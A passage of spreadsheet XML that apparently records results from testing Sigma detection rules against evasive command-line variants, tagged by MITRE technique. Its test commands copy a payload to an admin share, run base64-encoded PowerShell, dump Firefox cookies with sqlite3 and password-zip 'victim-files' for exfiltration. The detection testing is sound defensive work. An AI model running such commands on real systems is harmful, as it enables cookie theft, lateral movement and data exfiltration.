    </row>
    <row r="118" ht="15.75" customHeight="1" s="42">
      <c r="A118" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B118" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C118" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D118" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E118" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H118" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I118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18" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K118" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1" s="42">
      <c r="A119" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B119" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C119" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D119" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E119" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I119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19" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K119" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="120" ht="15.75" customHeight="1" s="42">
      <c r="A120" s="44" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B120" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C120" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D120" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E120" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I120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20" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K120" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1" s="42">
      <c r="A121" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B121" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C121" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D121" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E121" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I121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21" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K121" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="122" ht="15.75" customHeight="1" s="42">
      <c r="A122" s="44" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B122" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C122" s="44" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D122" s="44" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E122" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I122" s="44" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f); Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f)</t>
        </is>
      </c>
      <c r="J122" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K122" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1" s="42">
      <c r="A123" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B123" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C123" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D123" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E123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23" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I123" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J123" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K123" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="124" ht="15.75" customHeight="1" s="42">
      <c r="A124" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B124" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C124" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D124" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E124" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I124" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J124" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K124" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="125" ht="15.75" customHeight="1" s="42">
      <c r="A125" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B125" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C125" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D125" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E125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25" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I125" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J125" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K125" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="126" ht="15.75" customHeight="1" s="42">
      <c r="A126" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B126" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C126" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D126" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E126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26" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I126" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J126" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K126" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="127" ht="15.75" customHeight="1" s="42">
      <c r="A127" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B127" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C127" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D127" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E127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27" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G127" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H127" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I127" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J127" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K127" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="128" ht="15.75" customHeight="1" s="42">
      <c r="A128" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B128" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C128" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D128" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E128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28" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I128" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J128" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K128" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="129" ht="15.75" customHeight="1" s="42">
      <c r="A129" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B129" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C129" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D129" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E129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29" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H129" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I129" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J129" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K129" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="130" ht="15.75" customHeight="1" s="42">
      <c r="A130" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B130" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C130" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D130" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E130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30" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G130" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H130" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I130" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J130" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K130" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="44" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B131" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C131" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D131" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E131" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F131" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G131" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H131" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I131" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J131" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K131" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="132" ht="15.75" customHeight="1" s="42">
      <c r="A132" s="44" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B132" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C132" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D132" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E132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132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H132" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I132" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J132" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K132" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1" s="42">
      <c r="A133" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B133" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C133" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D133" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E133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33" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G133" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H133" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I133" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J133" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K133" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1" s="42">
      <c r="A134" s="44" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B134" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C134" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D134" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E134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34" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G134" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H134" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I134" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J134" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K134" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="135" ht="15.75" customHeight="1" s="42">
      <c r="A135" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B135" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C135" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D135" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E135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35" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G135" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H135" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I135" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J135" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K135" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B136" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C136" s="43" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D136" s="43" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E136" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDedCoMMand QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G136" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H136" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I136" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J136" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K136" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="137" ht="15.75" customHeight="1" s="42">
      <c r="A137" s="43" t="n"/>
      <c r="B137" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C137" s="44" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D137" s="44" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E137" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G137" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H137" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I137" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J137" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K137" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="138" ht="15.75" customHeight="1" s="42">
      <c r="A138" s="43" t="n"/>
      <c r="B138" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C138" s="44" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D138" s="44" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E138" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F138" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G138" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H138" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I138" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J138" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K138" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="139" ht="15.75" customHeight="1" s="42">
      <c r="A139" s="43" t="n"/>
      <c r="B139" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C139" s="44" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D139" s="44" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E139" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3.exe %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G139" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H139" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I139" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J139" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K139" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="140" ht="15.75" customHeight="1" s="42">
      <c r="A140" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B140" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winzip_password_compression</t>
        </is>
      </c>
      <c r="C140" s="43" t="inlineStr">
        <is>
          <t>Compress Data and Lock With Password for Exfiltration With WINZIP</t>
        </is>
      </c>
      <c r="D140" s="43" t="inlineStr">
        <is>
          <t>e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d</t>
        </is>
      </c>
      <c r="E140" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c path=%path%;"C:\Program Files (x86)\winzip" &amp; mkdir .	mp\victim-files &amp; cd .	mp\victim-files &amp; echo "This file will be encrypted" &gt; .\encrypted_file.txt &amp; "%ProgramFiles%\WinZip\winzip64.exe" -a -min -s"hello" archive.zip * &amp; dir</t>
        </is>
      </c>
      <c r="F140" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G140" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H140" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I140" s="43" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command (7c9340a9-e2ee-4e43-94c5-c54ebbea1006)</t>
        </is>
      </c>
      <c r="J140" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K140" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="141" ht="15.75" customHeight="1" s="42">
      <c r="A141" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B141" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winzip_password_compression</t>
        </is>
      </c>
      <c r="C141" s="43" t="inlineStr">
        <is>
          <t>Compress Data and Lock With Password for Exfiltration With WINZIP</t>
        </is>
      </c>
      <c r="D141" s="43" t="inlineStr">
        <is>
          <t>e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d</t>
        </is>
      </c>
      <c r="E141" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c path=%path%;"C:\Program Files (x86)\winzip" &amp; mkdir .	mp\victim-files &amp; cd .	mp\victim-files &amp; echo "This file will be encrypted" &gt; .\encrypted_file.txt &amp; "%ProgramFiles%\WinZip\winzip64.exe"  -min  -a  -s"hello" archive.zip * &amp; dir</t>
        </is>
      </c>
      <c r="F141" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G141" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H141" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I141" s="43" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command (7c9340a9-e2ee-4e43-94c5-c54ebbea1006)</t>
        </is>
      </c>
      <c r="J141" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K141" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1" s="42">
      <c r="A142" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B142" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winzip_password_compression</t>
        </is>
      </c>
      <c r="C142" s="43" t="inlineStr">
        <is>
          <t>Compress Data and Lock With Password for Exfiltration With WINZIP</t>
        </is>
      </c>
      <c r="D142" s="43" t="inlineStr">
        <is>
          <t>e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d</t>
        </is>
      </c>
      <c r="E142" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c path=%path%;"C:\Program Files (x86)\winzip" &amp; mkdir .	mp\victim-files &amp; cd .	mp\victim-files &amp; echo "This file will be encrypted" &gt; .\encrypted_file.txt &amp; "%ProgramFiles%\WinZip\winzip64.exe" -min -a "-s"hello"" archive.zip * &amp; dir</t>
        </is>
      </c>
      <c r="F142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G142" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H142" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I142" s="43" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command (7c9340a9-e2ee-4e43-94c5-c54ebbea1006)</t>
        </is>
      </c>
      <c r="J142" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K142" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B143" s="43" t="inlineStr">
        <is>
